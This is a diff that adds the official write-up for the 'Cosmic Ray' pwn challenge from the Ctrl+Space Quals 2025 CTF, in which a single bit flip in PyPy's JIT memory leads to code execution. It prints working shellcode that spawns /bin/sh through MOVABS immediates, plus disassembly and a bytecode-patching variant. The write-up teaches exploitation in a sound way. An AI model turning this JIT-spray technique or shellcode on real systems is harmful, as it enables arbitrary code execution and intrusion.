|
| 1 | +--- |
| 2 | +title: "Cosmic Ray - Ctrl+Space Quals 2025" |
| 3 | +date: "2025-10-02" |
| 4 | +description: "The official writeup for the challenge Cosmic Ray from the Ctrl+Space Quals 2025 CTF" |
| 5 | +tags: ["pwn", "ctf", "ctrl", "space", "mhackeroni"] |
| 6 | +showAuthor: false |
| 7 | +--- |
| 8 | + |
| 9 | +Author: [mebeim](https://github.com/mebeim) (Marco Bonelli) |
| 10 | + |
| 11 | +Full source code of the challenge is available [here](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/) |
| 12 | + |
| 13 | +> I had written a perfect program, when all of a sudden... a cosmic ray was |
| 14 | +> enough to pwn my entire system :( |
| 15 | +
|
| 16 | + |
| 17 | +## Description |
| 18 | + |
| 19 | +*For a TL;DR of the solution, just check the comments in [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py).* |
| 20 | + |
| 21 | +The challenge consists of a simple Python 3 program ([`app.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/src/app.py)) ran |
| 22 | +by the [PyPy][pypy] interpreter that implements a CLI to create and invoke |
| 23 | +custom Python `lambda` functions. These functions can be created using a limited |
| 24 | +set of whitelisted operations, take a single argument and return a single value. |
| 25 | + |
| 26 | +```none |
| 27 | +Available commands: |
| 28 | + [B]uild a function |
| 29 | + [C]all a function |
| 30 | + [L]ist functions |
| 31 | + [T]rigger a cosmic ray |
| 32 | +
|
| 33 | +> B |
| 34 | +Name: foo |
| 35 | +Input one operation per line, end with "END": |
| 36 | +> ADD 10 |
| 37 | +> MUL 2 |
| 38 | +> REPEAT 5 |
| 39 | +> LIST |
| 40 | +> END |
| 41 | +Function created! |
| 42 | +
|
| 43 | +> L |
| 44 | +Currently defined functions: |
| 45 | + foo = lambda x: list(((((x) + 10) * 2) for _ in range(5))) |
| 46 | +
|
| 47 | +> C |
| 48 | +Name: foo |
| 49 | +Argument: 1 |
| 50 | +Result: [22, 22, 22, 22, 22] |
| 51 | +``` |
| 52 | + |
| 53 | +Other than that, the script also offers an interesting functionality (cosmic |
| 54 | +ray) that allows the user to flip a bit in certain memory areas: |
| 55 | + |
| 56 | +```py |
| 57 | +try: |
| 58 | + where = int(input('Where? '), 0) |
| 59 | +except ValueError: |
| 60 | + raise ValueError('Invalid input') from None |
| 61 | + |
| 62 | +offset = where // 8 |
| 63 | +bit = where % 8 |
| 64 | + |
| 65 | +# ... scan /proc/self/maps and calculate vaddr |
| 66 | + |
| 67 | +from cffi import FFI |
| 68 | +FFI().cast("unsigned char *", vaddr)[0] ^= (1 << bit) |
| 69 | +``` |
| 70 | + |
| 71 | +This bit flip is only allowed in writeable anonymous memory areas, excluding the |
| 72 | +process stack, and is also only allowed once due to a global variable that is |
| 73 | +set after first usage. |
| 74 | + |
| 75 | + |
| 76 | +## Goal |
| 77 | + |
| 78 | +The goal is clear: achieve arbitrary code execution to read the contents of the |
| 79 | +`/flag` file. The memory areas where the bit flip is allowed are pretty much |
| 80 | +limited to a handful of anonymous mappings: the interpreter heap (brk), the |
| 81 | +Python heap (where most Python objects live) and a RWX mapping used by PyPy to |
| 82 | +JIT compile Python code whenever it deems it necessary. Anything else is |
| 83 | +seemingly untouchable (bad permissions and/or non-anonymous). |
| 84 | + |
| 85 | +```none |
| 86 | +$ sudo cat /proc/$(pidof pypy3)/maps |
| 87 | +5e177bf9f000-5e177bfa0000 r--p 00000000 00:43 21012271 /usr/bin/pypy3.10-c |
| 88 | +5e177bfa0000-5e177bfa1000 r-xp 00001000 00:43 21012271 /usr/bin/pypy3.10-c |
| 89 | +5e177bfa1000-5e177bfa2000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c |
| 90 | +5e177bfa2000-5e177bfa3000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c |
| 91 | +5e177bfa3000-5e177bfa4000 rw-p 00003000 00:43 21012271 /usr/bin/pypy3.10-c |
| 92 | +5e178c01a000-5e178c01b000 ---p 00000000 00:00 0 [heap] |
| 93 | +5e178c01b000-5e178c01e000 rw-p 00000000 00:00 0 [heap] |
| 94 | +7a2d7cf60000-7a2d7d0d0000 rw-p 00000000 00:00 0 |
| 95 | +7a2d7d0d0000-7a2d7d1d0000 rwxp 00000000 00:00 0 |
| 96 | +7a2d7d1f1000-7a2d7e9c3000 rw-p 00000000 00:00 0 |
| 97 | +... |
| 98 | +``` |
| 99 | + |
| 100 | +Since the script only allows for one bit flip to happen, a viable solution must |
| 101 | +either achieve arbitrary code execution via a single bit flip or use the initial |
| 102 | +bit flip to disable the global variable check and allow for more (preferably |
| 103 | +unlimited) bit flips. |
| 104 | + |
| 105 | + |
| 106 | +## Solution |
| 107 | + |
| 108 | +There are two main solution paths, although one of them remains theoretical and |
| 109 | +I have not spent too much time investigating its feasibility. It is however |
| 110 | +worth mentioning (find it below). |
| 111 | + |
| 112 | +### Altering JITed Code |
| 113 | + |
| 114 | +As you might already know, PyPy3 is known for its ability to Just-In-Time |
| 115 | +compile Python code into machine code (in this case, x86-64). This is done only |
| 116 | +if deemed necessary by the interpreter, which means only for "hot" loops. For |
| 117 | +example, a long enough loop doing calculations or an infinite `while True` loop |
| 118 | +are highly likely to be JITed. The JITed code is written to and executed |
| 119 | +directly from a RWX memory region. This is a prime target for a "cosmic ray". |
| 120 | + |
| 121 | +We can create a "hot" loop within a `lambda` function with the `REPEAT` |
| 122 | +operation, which translates to `((EXPR) for _ in range(N))` where `N` is |
| 123 | +controlled and `EXPR` comes from previous operations (also controlled). |
| 124 | + |
| 125 | +A very simple lambda built with `ADD 0x1122334455` + `REPEAT 9999` + `LIST` will |
| 126 | +be JITed by PyPy at a deterministic offset into the RWX JIT memory area. What's |
| 127 | +more interesting is that a large enough constant (between 5 and 8 bytes) will |
| 128 | +most likely get embedded *as is* into JITed code as an immediate for the x86 |
| 129 | +MOVABS instruction (a.k.a. MOV r64, imm64). We can also notice this |
| 130 | +[in the PyPy codebase][pypy-jit-movabs]. This is also useful to find the |
| 131 | +address/offset of a specific piece of JITed code from GDB: |
| 132 | + |
| 133 | +```none |
| 134 | +$ sudo pwndbg --pid $(pidof pypy3) |
| 135 | +pwndbg> search -t qword --trunc-out 73588229205 |
| 136 | +Searching for an 8-byte integer: b'UD3"\x11\x00\x00\x00' |
| 137 | +[anon_7081faf76] 0x7081faf78679 push rbp /* 0x1122334455 */ |
| 138 | +[anon_7081faf76] 0x7081faf78945 push rbp /* 0x1122334455 */ |
| 139 | +... |
| 140 | +pwndbg> x/10i 0x7081faf78679 - 2 |
| 141 | + 0x7081faf78677: movabs r11,0x1122334455 |
| 142 | + 0x7081faf78681: add rdi,r11 |
| 143 | + 0x7081faf78684: jo 0x7081faf78c17 |
| 144 | +``` |
| 145 | + |
| 146 | +Doing simple mathematical operations with large values gives us a very good |
| 147 | +primitive to inject arbitrary bytes into JITed code via MOVABS. Other ways are |
| 148 | +definitely possible, but MOVABS gives us a lot of space. In particular, we have |
| 149 | +8 controlled immediate bytes ending up in a RWX region. If we can somehow flip |
| 150 | +some bit around the JITed code to jump into the immediate, we can use the first |
| 151 | +6 to run some arbitrary code, and the last two to perform a short jump into the |
| 152 | +immediate of a subsequent MOVABS instruction to continue. |
| 153 | + |
| 154 | +A `lambda` built with a sequence of arithmetical instructions with large |
| 155 | +immediates can easily turn into a sequence of MOVABS instructions. For example: |
| 156 | + |
| 157 | +```none |
| 158 | +ADD 0x1122334455 |
| 159 | +ADD 0x2233445566 |
| 160 | +ADD 0x3344556677 |
| 161 | +REPEAT 10000 |
| 162 | +LIST |
| 163 | +END |
| 164 | +``` |
| 165 | + |
| 166 | +Will become something like: |
| 167 | + |
| 168 | +```none |
| 169 | +... |
| 170 | +movabs r11,0x1122334455 |
| 171 | +add rdi,r11 |
| 172 | +jo 0x7bcffd7a0c87 |
| 173 | +mov QWORD PTR [rbx+0x28],0xe |
| 174 | +mov QWORD PTR [rbp+0x158],rdi |
| 175 | +movabs r11,0x2233445566 |
| 176 | +add rdi,r11 |
| 177 | +jo 0x7bcffd7a0ca3 |
| 178 | +mov QWORD PTR [rbx+0x28],0x12 |
| 179 | +mov QWORD PTR [rbp+0x158],rdi |
| 180 | +movabs r11,0x3344556677 |
| 181 | +add rdi,r11 |
| 182 | +jo 0x7bcffd7a0cbf |
| 183 | +... |
| 184 | +``` |
| 185 | + |
| 186 | +Taking a look at how MOVABS is encoded, we have: |
| 187 | + |
| 188 | +```none |
| 189 | +49 bb 55 44 33 22 11 00 00 00 movabs r11, 0x1122334455 |
| 190 | +``` |
| 191 | + |
| 192 | +Flipping bit 3 of the second byte turns the instruction into: |
| 193 | + |
| 194 | +```none |
| 195 | +49 b3 55 rex.WB mov r11b, 0x55 |
| 196 | +44 33 22 xor r12d, DWORD PTR [rdx] |
| 197 | +11 00 adc DWORD PTR [rax], eax |
| 198 | +... |
| 199 | +``` |
| 200 | + |
| 201 | +Other variations are also possible, like: |
| 202 | + |
| 203 | +```none |
| 204 | +49 9b rex.WB fwait |
| 205 | +55 push rbp |
| 206 | +44 33 22 xor r12d, DWORD PTR [rdx] |
| 207 | +11 00 adc DWORD PTR [rax], eax |
| 208 | +... |
| 209 | +``` |
| 210 | + |
| 211 | +*`fwait`... you really never stop learning new x86 instructions, huh?* |
| 212 | + |
| 213 | +One single bit flip is therefore enough to start executing part of the original |
| 214 | +MOVABS immediate we provide as code. We can encode an initial JMP ahead into the |
| 215 | +next immediate, perform some instructions, JMP imm8 to the next, and repeat. |
| 216 | +This is more than enough to pop a shell. |
| 217 | + |
| 218 | +The only thing we must pay attention to is a small optimization performed by the |
| 219 | +PyPy JIT compiler when dealing with consecutive integer values that are "close |
| 220 | +enough" to each other (within 32-bit distance). Doing the same as above with |
| 221 | +`ADD 0x1122334455` followed by `ADD 0x1122334466` will JIT compile into: |
| 222 | + |
| 223 | +```none |
| 224 | +movabs r11,0x1122334455 |
| 225 | +add rdi,r11 |
| 226 | +jo 0x7a721ea94c47 |
| 227 | +mov QWORD PTR [rbx+0x28],0xe |
| 228 | +mov QWORD PTR [rbp+0x158],rdi |
| 229 | +lea r11,[r11+0x11] <<<<<< |
| 230 | +add rdi,r11 |
| 231 | +jo 0x7a721ea94c63 |
| 232 | +``` |
| 233 | + |
| 234 | +Not a problem if our immediates are "far enough" from each other in value, but |
| 235 | +even then, all is fine with a bit of juggling around. |
| 236 | + |
| 237 | +Now it's GG. We can read in more shellcode, run existing code (we can definitely |
| 238 | +break ASLR now), or even just directly pop a shell via `execve`. The final |
| 239 | +sequence of instructions I used to call |
| 240 | +`execve("/bin/sh", {"/bin/sh", NULL}, NULL)` looks like this: |
| 241 | + |
| 242 | +```none |
| 243 | +ADD 0x01010101011ceb90 -> jmp short $+0x1e |
| 244 | +ADD 0x17eb900068732f68 -> push 0x68732f '/sh\x00' |
| 245 | + jmp short $+0x19 |
| 246 | +ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16 |
| 247 | + jmp short $+0x19 |
| 248 | +ADD 0x17eb6e6924048166 -> add word ptr [rsp], 0x6e69 'in' |
| 249 | + jmp short $+0x19 |
| 250 | +ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16 |
| 251 | + jmp short $+0x19 |
| 252 | +ADD 0x616161000000ede9 -> jmp $+0xf2 |
| 253 | +ADD 0x61eb622f24048166 -> add word ptr [rsp], 0x622f '/b' |
| 254 | + jmp short $+0x63 |
| 255 | +ADD 0x61eb90006ae78948 -> mov rdi, rsp rdi = "/bin/sh" |
| 256 | + push 0 |
| 257 | + jmp short $+0x63 |
| 258 | +ADD 0x61eb9090e6894857 -> push rdi |
| 259 | + mov rsi, rsp rsi = {"/bin/sh", NULL} |
| 260 | + jmp short $+0x63 |
| 261 | +ADD 0x61eb3bb0c031d231 -> xor edx, edx rdx = NULL |
| 262 | + xor eax, eax |
| 263 | + mov al, 0x3b rax = __NR_execve |
| 264 | + jmp short $+0x63 |
| 265 | +ADD 0x61eb90909090050f -> syscall |
| 266 | +REPEAT 10000 |
| 267 | +LIST |
| 268 | +``` |
| 269 | + |
| 270 | +The first instruction is changed from `movabs r11, 0x01010101011ceb90` to |
| 271 | +`rex.WB mov r11b, 0x90; jmp short $+0x1e`, which starts the whole thing. The |
| 272 | +only quirk about this solution is that after a few MOVABS instructions PyPy |
| 273 | +inserts additional checks in the JITed code, causing the offset between |
| 274 | +subsequent MOVABS to change. There is also a big gap in the middle where I have |
| 275 | +to waste an entire immediate to fit a JMP off32 (5 bytes). In any case, no big |
| 276 | +deal. |
| 277 | + |
| 278 | +### Alternate Solution: Altering Python Bytecode |
| 279 | + |
| 280 | +As we all know Python is an interpreted language with an intermediate bytecode |
| 281 | +representation that is executed by the interpreter virtual machine. Instead of |
| 282 | +focusing on what happens after the PyPy JIT kicks in, we could also alter the |
| 283 | +Python bytecode itself. Assuming that the bytecode for script functions is |
| 284 | +stored in one of the memory areas we can modify, and assuming that its offset is |
| 285 | +fixed (or at least stable enough), flipping a bit to modify the bytecode can |
| 286 | +drastically modify the script's behavior. |
| 287 | + |
| 288 | +There is no obvious way to use a single bit flip to obtain arbitrary [byte]code |
| 289 | +execution, let alone re-use some part of existing bytecode to open, read and |
| 290 | +print the contents of an arbitrary file. If we want to modify bytecode we will |
| 291 | +have to do so to bypass the single cosmic ray limit, and then use more cosmic |
| 292 | +rays to edit existing bytecode at will. |
| 293 | + |
| 294 | +If we take a look at the bytecode for the `cosmic_ray()` function using |
| 295 | +[`dis.dis()`][py-dis-dis] we can see a few interesting spots where flipping a |
| 296 | +bit would result in bypassing the global variable check, allowing infinite |
| 297 | +"cosmic rays" to hit. We can also access the raw bytecode as a `bytes` object |
| 298 | +via `cosmic_ray.__code__.co_code` to check actual opcodes and arguments. |
| 299 | + |
| 300 | +Some interestig opcodes to consider for the bit flip are right at the start and |
| 301 | +towards the end of the function: |
| 302 | + |
| 303 | +```none |
| 304 | +0 LOAD_GLOBAL 0 (COSMIC_RAY_HIT) |
| 305 | +2 POP_JUMP_IF_FALSE 8 (to 16) |
| 306 | +... |
| 307 | +324 LOAD_CONST 22 (True) |
| 308 | +326 STORE_GLOBAL 0 (COSMIC_RAY_HIT) |
| 309 | +... |
| 310 | +``` |
| 311 | + |
| 312 | +The opcode for `POP_JUMP_IF_FALSE` is 0x72: flipping its LSB turns it into 0x73, |
| 313 | +which is `POP_JUMP_IF_TRUE`. This would simply negate the `if` condition and |
| 314 | +allow for unlimited cosmic rays after the first call to the function (which sets |
| 315 | +`COSMIC_RAY_HIT = True` befor return). |
| 316 | + |
| 317 | +Similarly, changing the argument for `STORE_GLOBAL` to something other than 0 |
| 318 | +would cause the script to create a new global variable instead of modifying |
| 319 | +`COSMIC_RAY_HIT`. Modifying one of the above opcodes into something else may |
| 320 | +also work, depending on the specific case. |
| 321 | + |
| 322 | +There are however a couple of problems with this approach: |
| 323 | + |
| 324 | +1. We are working with offsets into memory, and not absolute addresses. While |
| 325 | + the memory layout seems pretty stable at first, the `cosmic_ray()` functions |
| 326 | + imports the `cffi` module, causing a bunch of mappings to be created and also |
| 327 | + moving existing Python objects around. This results in a not-so-predictable |
| 328 | + layout after the first invocation. Subsequent invocations to perform more |
| 329 | + bit flips would need to take this into account. |
| 330 | +2. Depending on which opcode we choose to modify and how, we might end up |
| 331 | + crashing the interpreter either via internal check failures or plain and |
| 332 | + simple segmentation faults. For example, I have noticed that changing |
| 333 | + `STORE_GLOBAL 0` to `STORE_GLOBAL 8` (thus creating `FFI = True` globally) |
| 334 | + works on Ubuntu 24 `pypy3`, but crashes with a HLT for Alpine `pypy3` (used |
| 335 | + in the challenge container). YMMV. |
| 336 | + |
| 337 | +This is the main reason I did not explore this solution path any further. It |
| 338 | +does however still seem within the realm of possibility. |
| 339 | + |
| 340 | + |
| 341 | +### Complete Exploit |
| 342 | + |
| 343 | +See [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py) for the complete exploit. A simplified version is |
| 344 | +available at [`checker/__main__.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/checker/__main__.py) and is intended to be |
| 345 | +used as an automated status check. |
| 346 | + |
| 347 | + |
| 348 | +[pypy]: https://www.pypy.org |
| 349 | +[pypy-jit-movabs]: https://github.com/pypy/pypy/blob/76657ba47f6d48c7db77615d3a26bd5029f8b05a/rpython/jit/backend/x86/rx86.py#L886 |
| 350 | +[py-dis-dis]: https://docs.python.org/3/library/dis.html#dis.dis |
0 commit comments